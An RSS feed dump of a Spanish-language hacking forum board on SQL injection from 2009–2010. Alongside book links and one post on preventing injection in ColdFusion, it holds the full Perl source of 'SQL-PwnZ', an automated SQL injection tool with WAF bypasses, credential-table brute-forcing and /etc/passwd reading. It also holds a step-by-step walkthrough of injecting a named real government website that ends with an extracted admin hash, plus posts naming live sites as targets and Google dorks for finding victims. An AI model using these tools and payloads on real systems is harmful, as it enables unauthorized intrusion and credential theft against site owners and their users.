- SQL Injections Generales https://foro.undersecurity.net/list.php?46Mon, 06 Sep 2010 12:29:47 -0400 Phorum 5.2.15a https://foro.undersecurity.net/read.php?46,7898,7898#msg-7898 Blind SQL Injection: Inference through Underflow Error (oracle) (1 reply)https://foro.undersecurity.net/read.php?46,7898,7898#msg-7898http://dbellucci.blogspot.com/2009/12/blind-sql-injection-inference-through.html]]> seth SQL Injections GeneralesTue, 31 Aug 2010 01:48:59 -0400 https://foro.undersecurity.net/read.php?46,7708,7708#msg-7708 SQL Injection Cheat Sheet (no replies)https://foro.undersecurity.net/read.php?46,7708,7708#msg-7708SQL Injection Cheat Sheet, Document Version 1.4

About SQL Injection Cheat Sheet

Quote

Currently only for MySQL and Microsoft SQL Server, some ORACLE and some PostgreSQL. Most of samples are not correct for every single situation. Most of the real world environments may change because of parenthesis, different code bases and unexpected, strange SQL sentences.

Samples are provided to allow reader to get basic idea of a potential attack and almost every section includes a brief information about itself.
M : MySQL
S : SQL Server
P : PostgreSQL
O : Oracle
+ : Possibly all other databases
Examples;

* (MS) means : MySQL and SQL Server etc.
* (M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server

Table Of Contents

1. About SQL Injection Cheat Sheet
   2. Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
         1. Line Comments
                * SQL Injection Attack Samples
         2. Inline Comments
                * Classical Inline Comment SQL Injection Attack Samples
                * MySQL Version Detection Sample Attacks
         3. Stacking Queries
                * Language / Database Stacked Query Support Table
                * About MySQL and PHP
                * Stacked SQL Injection Attack Samples
         4. If Statements
                * MySQL If Statement
                * SQL Server If Statement
                * If Statement SQL Injection Attack Samples
         5. Using Integers
         6. String  Operations
                * String Concatenation
         7. Strings without Quotes
                * Hex based SQL Injection Samples
         8. String Modification & Related
         9. Union Injections
                * UNION – Fixing Language Issues
        10. Bypassing Login Screens
        11. Enabling xp_cmdshell in SQL Server 2005
        12. Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see.




http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/]]> seth SQL Injections GeneralesMon, 02 Aug 2010 14:35:47 -0400 https://foro.undersecurity.net/read.php?46,7492,7492#msg-7492 MSSQL INJECTION (no replies)https://foro.undersecurity.net/read.php?46,7492,7492#msg-7492
Una página .php hace uso mediante Transact SQL (base de datos mssql) de un try / catch para procesar una query:

Language: SQL
BEGIN TRY
     { sql_statement  }
END TRY
BEGIN CATCH
         SELECT "'Error: ' + ERROR_MESSAGE()";
END CATCH

es posible inyectar algo? Porque soy rotúndamente incapaz de sacar nada en claro de cualquier consulta que hago...., mirad, os pongo la web, si quereis intentarlo y conseguis algo, responder! xD

http://antharas.lineage2.es/mapclan.php?char_name=INYECTHERE]]> tragantras SQL Injections GeneralesWed, 30 Jun 2010 10:47:26 -0400 https://foro.undersecurity.net/read.php?46,7356,7356#msg-7356 ayuda sql [ union+select y me dice forbidden.] (3 replies)https://foro.undersecurity.net/read.php?46,7356,7356#msg-7356http://www1.uesiglo21.edu.ar/e-campus/tickets/categoria.php?u=USER
Sin pedir autenticacion y con cambiar la variable del campo user puedo entrar a ver las consultas de otros user con solo el usuario.
Que se le podria hacer con algo asi?
Ya intente hacer un union+select y me dice forbidden.
Alguna ayuda.]]> kerber0s SQL Injections GeneralesWed, 23 Jun 2010 08:42:29 -0400 https://foro.undersecurity.net/read.php?46,6954,6954#msg-6954 SQL-PwnZ v1.5 [NEW] [Mix Collations & mod_security Bypass] (15 replies)https://foro.undersecurity.net/read.php?46,6954,6954#msg-6954Nuevo:

[+] Agregado mod_security Bypass.
[+] Agregado Illegal Mix Of Collations Bypass.
[+] Agregadas más tablas para bruteforce.
[+] Agregadas más columnas para bruteforce.
[+] Código interno mejorado.
[+] Bugs Fixeados.
[+] Fix case sensitive. (Gracias yoyahack & seth).
[+] AND+1=char(97)=char(87) (Gracias OzX).
[+] Hex LOAD_FILE Fix.

Sitio con mod_security activado:




SQL-PwnZ: Bypasseando




Salida:






Sitio con Illegal Mix Of Collations:




SQL-PwnZ: Bypasseando




Salida:






Código:

#!/usr/bin/perl

##################################################################################################################
#                                  -[+]- SQL-PwnZ v1.5 | By Login-Root -[+]-                                   ###
##################################################################################################################

##################################################################################################################
# [+] inf0:                                                                                                    ###
##################################################################################################################
# Busca:                                                                                                       ###
# ======                                                                                                       ###
#  - Nº de columnas                                                                                            ###
#  - Information_Schema && MySQL.User                                                                          ###
#  - LOAD_FILE                                                                                                 ###
#  - Tablas                                                                                                    ###
#  - Columnas                                                                                                  ###
#  - Illegal Mix Of Collations Bypass && mod_security Bypass                                                   ###
#                                                                                                              ###
#  ...y guarda todo en un archivo de texto.                                                                    ###
#                                                                                                              ###
##################################################################################################################

##################################################################################################################
# [+] Use:                                                                                                     ###
##################################################################################################################
# perl sqlpwnz.pl [WEBSITE] [COLUMNAS] [ARCHIVO] [COMENTARIO] [-TB] [-CL] [-NOCHECK] [-MOD_FUCK] [-MIX_BYPASS] ###
#   [WEBSITE]: http://www.web.com/index.php?id=12 [INGRESAR UN ID VALIDO]                                      ###
#   [COLUMNAS]: Limite de columnas                                                                             ###
#   [ARCHIVO]: Archivo donde guardar web vulnerable                                                            ###
#   [COMENTARIO]: '/*' o '--' (Sin las comillas) (Opcional)                                                    ###
#   [-TB]: Intentar brutear tablas (Opcional)                                                                  ###
#   [-CL]: Intentar brutear columnas (Opcional)                                                                ###
#   [-NOCHECK]: No hacer el chequeo inicial (Opcional)                                                         ###
#   [-MOD_FUCK]: Activar mod_security Bypass (Opcional)                                                        ###
#   [-MIX_BYPASS]: Activar Illegal Mix Of Collations Bypass (Opcional)                                         ###
##################################################################################################################

##################################################################################################################
# [+] c0ntact:                                                                                                 ###
##################################################################################################################
# MSN:    no.more@passport.com                                                                                 ###
# E-Mail: login_root@yahoo.com.ar                                                                              ###
##################################################################################################################

##################################################################################################################
# [+] sh0utz:                                                                                                  ###
##################################################################################################################
# Greetz: KiKo ; VanHan ; [Dead] Knet ; Ricota ; InyeXion ; OxOnO ; Matt ; r0dr1 ; oceanik6 ; OzX ; yoyahack   ###
# VISIT: WWW.REMOTEEXECUTION.ORG | WWW.DIOSDELARED.COM                                                         ###
##################################################################################################################

use HTTP::Request;
use LWP::UserAgent;

if(!$ARGV[2])
	{
		 print "\n\n-[+]- SQL-PwnZ v1.5 | By Login-Root -[+]-\n=========================================";
		 print "\n\nUso: perl $0 [WEBSITE] [COLUMNAS] [ARCHIVO] [COMENTARIO] [-TB] [-CL] [-NOCHECK] [-MOD_FUCK] [-MIX_BYPASS]\n";
		 print "\n[WEBSITE]: http://www.web.com/index.php?id=12 [INGRESAR UN ID VALIDO]\n[COLUMNAS]: Limite de columnas\n[ARCHIVO]: Archivo donde guardar web vulnerable\n[COMENTARIO]: '/*' o '--' (Sin las comillas) (Opcional)\n[-TB]: Intentar brutear tablas (Opcional)\n[-CL]: Intentar brutear columnas (Opcional)\n[-NOCHECK]: No hacer el chequeo inicial (Opcional)\n[-MOD_FUCK]: Activar mod_security Bypass (Opcional)\n[-MIX_BYPASS]: Activar Illegal Mix Of Collations Bypass (Opcional)\n\n";
		 exit (0);
	}
	
@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','web_users',
	  'name','names','nombre','nombres','usuarios','member','members','admin_table','usuaris','web_usuarios',
	  'miembro','miembros','membername','admins','administrator','sign','config','USUARIS','cms_operadores',
	  'administrators','passwd','password','passwords','pass','Pass','mpn_authors','author','musuario','mysql.user',
	  'user_names','foro','tAdmin','tadmin','user_password','user_passwords','user_name',
	  'member_password','mods','mod','moderators','moderator','user_email','jos_users','mb_user','host','apellido_nombre',
	  'user_emails','user_mail','user_mails','mail','emails','email','address','jos_usuarios','tutorial_user_auth',
	  'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','tbl_usuarios','user_auth','login_radio',
	  'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tbl_admin','usuarios_head',
	  'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','BG_CMS_Users',
	  'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','foro_usuarios','cliente',
	  'sistema_usuario','sistema_password','contrasena','auth','key','senha','signin','dir_admin','alias','clientes',
	  'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','calendar_users','cursos',
      'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','web_users','curso',
      'membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup','leads','lead',
      'associated','accnt','customers','customer','membres','administrateur','utilisateur','riacms_users',
      'tuser','tusers','utilisateurs','password','amministratore','god','God','authors','wp_users','tb_usuarios',
      'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','tb_usuario',
	  'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');

@nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','senha',
          'username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','cliente',
          'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','host','pws','cedula','userName','host_password','chave','alias','apellido_nombre','cliente_nombre','cliente_email','cliente_pass','cliente_user','cliente_usuario',
          'login_id','usr','sistema_id','author','user_login','admin_user','admin_pass','uh_usuario','uh_password','psw','host_username',
          'sistema_usuario','auth','key','usuarios_nombre','usuarios_nick','usuarios_password','user_clave',
		  'membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo','usuario_nombre','usuario_nick','usuario_password',
          'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
          'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');

($host, $columnas, $savelist) = @ARGV;

$agent = LWP::UserAgent->new;
$agent->agent("Google Bot");

if ( $host   !~   /^http:/ ) 
  {
      $host = "http://" . $host;
  }

for ($numarg = 0 ;  $numarg <= $#ARGV ; $numarg++)
{
	$argumentos.= $ARGV[$numarg];
}

if ($argumentos =~ /-MIX_BYPASS/i)
{
	print "\n[+] MIX_BYPASS ACTIVADO";
	$hexin = "unhex(hex(";
	$hexend = "))";
}
if ($argumentos !~ /-MOD_FUCK/i)
{
if ($argumentos =~ /--/)
{
	$cmn= "+";
	$cfin="--";
	print "\n[+] Comentarios a utilizar: '--' & '+'";	
}
else
{
	$cmn= "/**/";
	$cfin= "/*";
	print "\n[+] Comentarios a utilizar: '/*' & '/**/'";
}
}
else
{
	print "\n[+] MOD_FUCK ACTIVADO, se ignoran comentarios. Utilizando: '+'. Bypass: '/*!' & '*/'";	
	$bypass = "+/*!";
	$cmn= "+";
	$cfin= "*/";
}

open(WEB,">>".$savelist) || die "\n\n[-] Imposible crear el archivo de texto\n";
if ($argumentos =~ /-NOCHECK/i)
  {
      print "\n[!] Se omite el chequeo inicial...\n";
      print WEB "[WEBSITE]:\n\n$host\n";
  }
else
  {
      print "\n[!] Chequeando si la web es vulnerable...\n";
      $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cfin));
      $response = $sql->content();
      if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/ || $response =~ /error de sintaxis al final de la entrada/ || $response =~ /Unknown column/)
        {
            print "[+] Web vulnerable, continua el script...\n";
            print WEB "[WEBSITE]:\n\n$host\n";
        }
        else
          {
            print "[-] Website aparentemente no vulnerable a SQL Inyection, intentar con otro comentario o con -NOCHECK activado\n\n";
	    close(WEB);
            exit(0);
          }
  }
print "\n[!] Buscando columnas...\n";
for ($column = 1 ; $column <= $columnas ; $column ++)
{
	$UNION.=','.$column;
	$inyection.=','."0x6c6f67696e70776e7a";
    if ($column == 1)
      {
          print WEB "\n[COLUMNAS]:\n\n";
          $inyection = '';
          $UNION = '';
      }
    $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin));
    $response = $sql->content();
    if($response =~ /loginpwnz/)
      {
         print "[+] La web posee $column columnas\n\n";
         $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cfin;
         print "$sql\n";
         print WEB "$sql\n";
         print "\n[!] Chequeando si existe Information_Schema...";
         $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."FROM".$cmn."information_schema.tables".$cfin));
         $response = $sql->content();
         if($response =~ /loginpwnz/)
         	{
         		print "\n[+] Information_Schema disponible...guardando en $savelist";
            $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cmn."FROM".$cmn."information_schema.tables".$cfin;
            print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
            	
         	}
         else
         	{
            	print "\n[-] Information_Schema no disponible";
         	}
         print "\n[!] Chequeando si existe MySQL.User...";
         $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."FROM".$cmn."mysql.user".$cfin));
         $response = $sql->content();
         if($response =~ /loginpwnz/)
         	{
         		print "\n[+] MySQL.User disponible...guardando en $savelist";
         		$sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cmn."FROM".$cmn."mysql.user".$cfin;
            	print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
            	
         	}
         else
         	{
            	print "\n[-] MySQL.User no disponible";
         	}
	while ($loadcont < $column-1)
	   {
		$loadfile.=','.$hexin.'LOAD_FILE(0x2f6574632f706173737764)'.$hexend;
		$loadcont++;
	   }
	print "\n[!] Chequeando si es posible inyectar LOAD_FILE...";
	$sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn.$hexin."LOAD_FILE(0x2f6574632f706173737764)".$hexend.$loadfile.$cfin));
    $response = $sql->content();
    if($response =~ /root:x:/)
         	{
         		print "\n[+] LOAD_FILE disponible...guardando en $savelist";
         		print WEB "\n\n[LOAD_FILE]:\n\n$hexinLOAD_FILE(0x2f6574632f706173737764)$hexend => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";
          }
         else
         	{
            	print "\n[-] LOAD_FILE no disponible";
         	}
	if ($argumentos =~ /-TB/i)
         	{
              print "\n\n[!] Bruteando tablas...";
              print WEB "\n\n[TABLAS]:\n\n";
              foreach $tabla(@nombretabla)
                {
                  chomp($tabla);
                  $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."FROM".$cmn.$tabla.$cfin));
                  $response = $sql->content();
                  if($response =~ /loginpwnz/)
                    {
                        print "\n[+] La tabla $tabla esta disponible...guardando en $savelist";
                        $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cmn."FROM".$cmn.$tabla.$cfin;
                        print WEB "$sql\n";
                    }
                }
           	}
        if ($argumentos =~ /-CL/i)
          {
          	print "\n\n[!] Tabla a la cual brutear columnas: ";
            $tabla=<STDIN>;
            chomp($tabla);
            print WEB "\n\n[COLUMNAS EN $tabla]:\n\n";
            foreach $columna(@nombrecolumna)
            {
             chomp($columna);
             $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn.$hexin."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$hexend.$inyection.$cmn."FROM".$cmn.$tabla.$cfin));
             $response = $sql->content();
             if ($response =~ /loginpwnz/)
                  {
                      print "\n[+] La columna $columna esta disponible...guardando en $savelist";
                      print WEB "$hexin$columna$hexend\n";
                  }
            }
        }
        print WEB "\n\n\n[*EOF*]";
        print "\n\n[+] Todo salvado correctamente en $savelist\n\n";
        print "## c0ded by Login-Root | 2010 ##\n\n";
	close(WEB);
        exit (0);
      }
}
print "[-] Imposible encontrar numero de columnas, intentar con mas columnas\n\n";
print "## c0ded by Login-Root | 2010 ##\n\n";
close(WEB);
exit (0);


Sitio:

http://sourceforge.net/projects/sqlpwnz/]]> Login-Root SQL Injections GeneralesSun, 11 Apr 2010 06:12:41 -0400 https://foro.undersecurity.net/read.php?46,6766,6766#msg-6766 Consulta: Bug SQL Injection. (7 replies)https://foro.undersecurity.net/read.php?46,6766,6766#msg-6766
Bueno hoy revisando la web encontre que una pagina tenia un bug a sql injection.

Lo que hice fue cambiar el ID=254 por ID=' y ahi me tiro los siguientes errores.


Aca le dejo la imagen del error que me tira.



Todo lo borrado lo hice porque mi intención no es hacer nada malo en esa pagina, si no aprender tecnicas y luego que ya la use "DE WEB PRUEBA" le informo al administrador, que tiene una vurnerabilidad en su web.


Desde ya muchas gracias!]]> heifede SQL Injections GeneralesSat, 06 Mar 2010 20:56:21 -0500 https://foro.undersecurity.net/read.php?46,6643,6643#msg-6643 Duda: Como obtener la pagina de login luego de obtener los datos? (6 replies)https://foro.undersecurity.net/read.php?46,6643,6643#msg-6643Una vez obtenidos los datos vienen algunas dudas: ¿Existe alguna forma de determinar el archivo para logearse (en caso que tenga habilitado el acceso via web) en el sitio?, ¿Existe algun tipo de "wordlist" con archivos de login por defecto?, ¿Existe alguna aplicacion para determinar los archivos de un directorio? (bruteforce se me ocurre). De antemano muchas gracias y saludos a los seguidores del foro.]]> cu4d SQL Injections GeneralesThu, 25 Feb 2010 15:19:19 -0500 https://foro.undersecurity.net/read.php?46,6440,6440#msg-6440 Using database Caches to detect SQL Injection (1 reply)https://foro.undersecurity.net/read.php?46,6440,6440#msg-6440
http://www.securitytube.net/Using-Database-Caches-to-Detect-SQL-injection-%28SecTor-2009%29-video.aspx

Saludos!!]]> prodigy SQL Injections GeneralesFri, 12 Feb 2010 17:03:26 -0500 https://foro.undersecurity.net/read.php?46,5672,5672#msg-5672 SQL INYECTION como si estuviera en primero. (no replies)https://foro.undersecurity.net/read.php?46,5672,5672#msg-5672
manual practico: http://www.forohack.com/Version_Imprimible.php?Id=369]]> BoF SQL Injections GeneralesSun, 06 Dec 2009 20:52:54 -0500 https://foro.undersecurity.net/read.php?46,5382,5382#msg-5382 Duda con SQL Injecion en paginas aspx (4 replies)https://foro.undersecurity.net/read.php?46,5382,5382#msg-5382


amigo hace tiempo vi un bideo sobre una inyeccion de este tipo,,, lo unico es q no m acuerdo q hay q hacer ejejejeje entren en eselink,, y podrian xplicamre ese error,,,]]> Xl1nuX SQL Injections GeneralesSun, 22 Nov 2009 13:50:35 -0500 https://foro.undersecurity.net/read.php?46,5029,5029#msg-5029 Asegúr@IT III - Ataques SQL Injection masivos (2 replies)https://foro.undersecurity.net/read.php?46,5029,5029#msg-5029Asegúr@IT III - Ataques SQL Injection masivos





Presentacion

Fuente]]> OzX SQL Injections GeneralesTue, 10 Nov 2009 21:52:21 -0500 https://foro.undersecurity.net/read.php?46,4931,4931#msg-4931 Microsoft JET Database Engine error '80040e21' (no replies)https://foro.undersecurity.net/read.php?46,4931,4931#msg-4931
Url : +and+1=0+union+select+1,2,3,4,5,6

Cannot use Memo, OLE, or Hyperlink Object field '<campo>' in the SELECT clause of a union query.


Buscando en google, me encontre con la solucion:

http://support.microsoft.com/kb/208926

Razon :Cuando se ejecuta una consulta de unión específica de SQL que contiene un campo objeto OLE, puede recibir el siguiente mensaje de error:

Solucion : Para evitar este error, agregue el predicado ALL para eliminar la ordenación de los datos del campo. Por ejemplo, agregar el predicado ALL a la siguiente instrucción SQL

Por lo tanto la Injeccion Seria :

Url : +and+1=0+union+all+select+1,2,3,4,5,6

Y Shanan ¡¡¡ :D funciono.


Saludos.
Undersecurity.net
OzX]]> OzX SQL Injections GeneralesFri, 06 Nov 2009 20:54:29 -0500 https://foro.undersecurity.net/read.php?46,4922,4922#msg-4922 Duda respecto a SQL injection (2 replies)https://foro.undersecurity.net/read.php?46,4922,4922#msg-4922
Saludos!!]]> prodigy SQL Injections GeneralesFri, 06 Nov 2009 19:15:49 -0500 https://foro.undersecurity.net/read.php?46,4834,4834#msg-4834 ayuda bind sql inyeccion (2 replies)https://foro.undersecurity.net/read.php?46,4834,4834#msg-4834 ReNcOoR SQL Injections GeneralesThu, 05 Nov 2009 23:44:37 -0500 https://foro.undersecurity.net/read.php?46,4779,4779#msg-4779 The Database Hacker's Handbook: Defending Database Servers (no replies)https://foro.undersecurity.net/read.php?46,4779,4779#msg-4779



Databases are the nerve center of our economy. Every piece of your personal information is stored there—medical records, bank accounts, employment history, pensions, car registrations, even your children's grades and what groceries you buy. Database attacks are potentially crippling—and relentless.

In this essential follow-up to The Shellcoder's Handbook, four of the world's top security experts teach you to break into and defend the seven most popular database servers. You'll learn how to identify vulnerabilities, how attacks are carried out, and how to stop the carnage. The bad guys already know all this. You need to know it too.

- Identify and plug the new holes in Oracle and Microsoft SQL Server
- Learn the best defenses for IBM's DB2, PostgreSQL, Sybase ASE, and MySQL servers
- Discover how buffer overflow exploitation, privilege escalation through SQL, stored procedure or trigger abuse, and SQL injection enable hacker access
- Recognize vulnerabilities peculiar to each database
- Find out what the attackers already know

Download]]> OzX SQL Injections GeneralesTue, 27 Oct 2009 21:50:01 -0400 https://foro.undersecurity.net/read.php?46,4742,4742#msg-4742 SQL Injection Attacks and Defense [Recomendado] (3 replies)https://foro.undersecurity.net/read.php?46,4742,4742#msg-4742

Justin Clarke "SQL Injection Attacks and Defense"
May 2009 | English | ISBN-13: 978-1-59749-424-3 | 494 Pages | PDF | 5.72 MB
SQL injection represents one of the most dangerous and well-known, yet misunderstood, security vulnerabilities on the Internet, largely because there is no central repository of information to turn to for help. This is the only book devoted exclusively to this long-established but recently growing threat. It includes all the currently known information about these attacks and significant insight from its contributing team of SQL injection experts.


DOwnload]]> OzX SQL Injections GeneralesMon, 26 Oct 2009 18:41:42 -0400 https://foro.undersecurity.net/read.php?46,4655,4655#msg-4655 SQL Injection Attacks for ORACLE Developers (1 reply)https://foro.undersecurity.net/read.php?46,4655,4655#msg-4655

Download]]> OzX SQL Injections GeneralesWed, 21 Oct 2009 21:43:53 -0400 https://foro.undersecurity.net/read.php?46,4642,4642#msg-4642 Sport.es? (7 replies)https://foro.undersecurity.net/read.php?46,4642,4642#msg-4642esta página, cuando rellenas y le das a enviar te sale un error de SQL, es posible "explotar" algo de ahí? Por simple curiosidad, me salió eso y como ustedes tienen conocimientos avanzados del mismo, quisera preguntarles...

Gracias]]> BlDKr SQL Injections GeneralesSat, 17 Oct 2009 22:06:34 -0400 https://foro.undersecurity.net/read.php?46,4638,4638#msg-4638 ¿Como Evitar SQL injection en ColdFusion ? (no replies)https://foro.undersecurity.net/read.php?46,4638,4638#msg-4638
* Comprobar los tipos de datos que se incorporan a un parámetro.
* Separar el código SQL de los parámetros introducidos.
* Garantizar que los valores de un parámetro nunca se agreguen a una consulta SQL modificando la misma para realizar un ataque.



Con la herramienta qpScanner es posible explorar el código, en busca de consultas con variables que no estén dentro de una etiqueta cfqueryparam.

Entre las características de qpScanner destaca:

* Encuentra todas las variables en consultas sin un cfqueryparam circundante.
* Exhibe nombres de fichero, las líneas de código y el contenido de la pregunta para todos los riesgos potenciales.
* Múltiples formatos de presentación de resultados (HTML, XML y WDDX).
* Soporta: ColdFusion 8, ColdFusion MX7, BlueDragon 7 y Railo 3.


Más información y descarga de qpScanner:
http://qpscanner.riaforge.org/

Más información sobre cfqueryparams en ColdFusion:
http://www.moopoint.com/tutorials/queryparam_intro.html

Fuente]]> OzX SQL Injections GeneralesFri, 16 Oct 2009 18:47:58 -0400 https://foro.undersecurity.net/read.php?46,4618,4618#msg-4618 Videos Tutoriales que Explican Como se Logra Generar una Injeccion SQL en Oracle (no replies)https://foro.undersecurity.net/read.php?46,4618,4618#msg-4618

IR]]> OzX SQL Injections GeneralesTue, 13 Oct 2009 20:48:53 -0400 https://foro.undersecurity.net/read.php?46,4415,4415#msg-4415 Diario de una Inyeccion SQL by LU73K (7 replies)https://foro.undersecurity.net/read.php?46,4415,4415#msg-4415
inurl:newsDetail.php?id=
inurl:gov+noticias.php?id=

Basicamente esas son dos lindas formas de buscar webs vunerables, es cuestion de ir probando dorks y pensar que tipo de web estoy buscando pra vulnerar.

En este tuto voy a usar un ejemplo con la web del Ministerio Nacional de Defensa de Camboya para que entiendan que cualquier kaker puede ownear una web X o un gov >.<

Para encontrar un gov en mi caso use el siguiente dork:

inurl:gov.kh+news.php?id=
(kh Camboya)

Me tope con el ministerio y chequie si la web era vulnerable:

http://www.mond.gov.kh/news.php?id='

Efectivamente era vulnerable dado que me tiro error:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/mondweb/public_html/news.php on line 55

Despues de esto se buscan tablas colocando despues del “=” “-1+union+select+1--” y ahi seguimos aumentando los números como en el siguiente ejemplo:

http://www.mond.gov.kh/news.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9--

Ahí nos arroja unos numeritos que indican que llegamos a una tabla vulnerable.

Ahora vamos a buscar el nombre de la tabla sustituyendo cualquiera de los numeros arrojados en la consulta por “table_name” en nuestra url.

http://www.mond.gov.kh/news.php?id=-1+UNION+SELECT+1,table_name,3,4,5,6,7,8,9--

Despues al final del ultimo nùmero agregamos “+from+information_schema.tables--”

http://www.mond.gov.kh/news.php?id=-1+UNION+SELECT+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables--

Como tiene “schema” nos tiro un nombre de tabla por default “CHARACTER_SETS”ahora en caso de que no tuviera “information_schema” ahi estaria complicado porque habria que brutear las tablas y eso lo dejamos para otro tutorial.

Lo que sigue es buscar algun tabla que nos sirva como la de admin o users, cualquier cosa que te permita logearte en el panel de admin o sacar info interesante.

Para seguir conociendo las tablas agregamos “+limit+1,1” y vamos incrementando el primer 1 a medida que nos va dando nombres de las tablas.

http://www.mond.gov.kh/news.php?id=-1+UNION+SELECT+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+limit+3,1--

Asi podemos seguir incrementando hasta dar con la tabla o podemos concatenar por grupo y mirar todas las tablas juntas:

http://www.mond.gov.kh/news.php?id=-1+UNION+SELECT+1,group_concat(table_name),3,4,5,6,7,8,9
+from+information_schema.tables--

Obtendriamos el siguiente resultado:

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,tblmondnews,tblusers

Hay que tener en cuenta que puede suceder que no se nos muestren todas las tablas en la ventana, cuando ustedes ven que en una web concatenaron y no sacaron ninguna tabla interesante puede ser porque no este en la ventana del nvegador y ahi no se desesperen y usen “limit” y busquen por ese metodo mas tediosos pero seguro xD.

En este caso encntre la tabla “tblusers”

Ahora tendriamso que buscar columnas importantes dentro de la tabla que nos den login. Pass,etc..

Lo que tenemos que hacer es cambiar dodne colocamos “table_name” por “column_name” y modificar la injection por:

+from+information_schema.columns+where+table_name=char(116,98,108,117,115,101,114,115)+limit+0,1--

Se preguntaran porque aparece l serie : 116,98,108,117,115,101,114,115 y eso es porque el nombre de la tabla “tblusers” en ASCII es 116,98,108,117,115,101,114,115 xD

Aca les ejo un convertidor online: http://getyourwebsitehere.com/jswb/text_to_ascii.html

Ahora podemos ir recorriendo las columnas con “limit+1,1--”

http://www.mond.gov.kh/news.php?id=1+union+all+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.columns+where+table_name=char(116,98,108,117,115,101,114,115)+limit+1,1--

Ahi me arrojo el nombre de la columna: UserName.

Pueden seguir incrementando “limit” o concatenar como hicimos con las tablas de la misma forma:

http://www.mond.gov.kh/news.php?id=1+union+all+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=char(116,98,108,117,115,101,114,115)--

Ahora tenemos todas las columnas de la tabla “tblusers”

uid,UserName,UPwd,AccType,RegDate,LastLogin,CounterLogin

Una vez que tenemos todo necesitamos sacar los datos concatenando nuveamente de la siguiente forma:

http://www.mond.gov.kh/news.php?id=1+union+all+select+1,2,concat(Username,0x3a,Upwd),4,5,6,7,8,9+from+tblusers--

Resultado:

admin:2a3aeea5c8a0ff9a428cba65ebceb7e8 :D

En este caso hay un solo admin y user pero si queremos sacar mas users podemos concatenar el grupo de la siguiente forma:

http://www.mond.gov.kh/news.php?id=1+union+all+select+1,2,group_concat(Username,0x3a,Upwd),4,5,6,7,8,9+from+tblusers--

Tmbien sucedio que en este caso la contraseña de Admin esta en MD5 y hay que crakearla (era de esperarse que como Ministeri Nacional de Defensa por lo menos tubieran una contraseña protegidita XD)

Hay webs que les van a dr la password en texto plano y otras que van a joder como en este caso, yo les recomiendo que usen google para crackear los hashes o tmb pueden ir al sitio de Zer0_Z0rG
http://www.informaticaxd.com.ar/ind3x.php?tool=md5 y probar suerte jeje

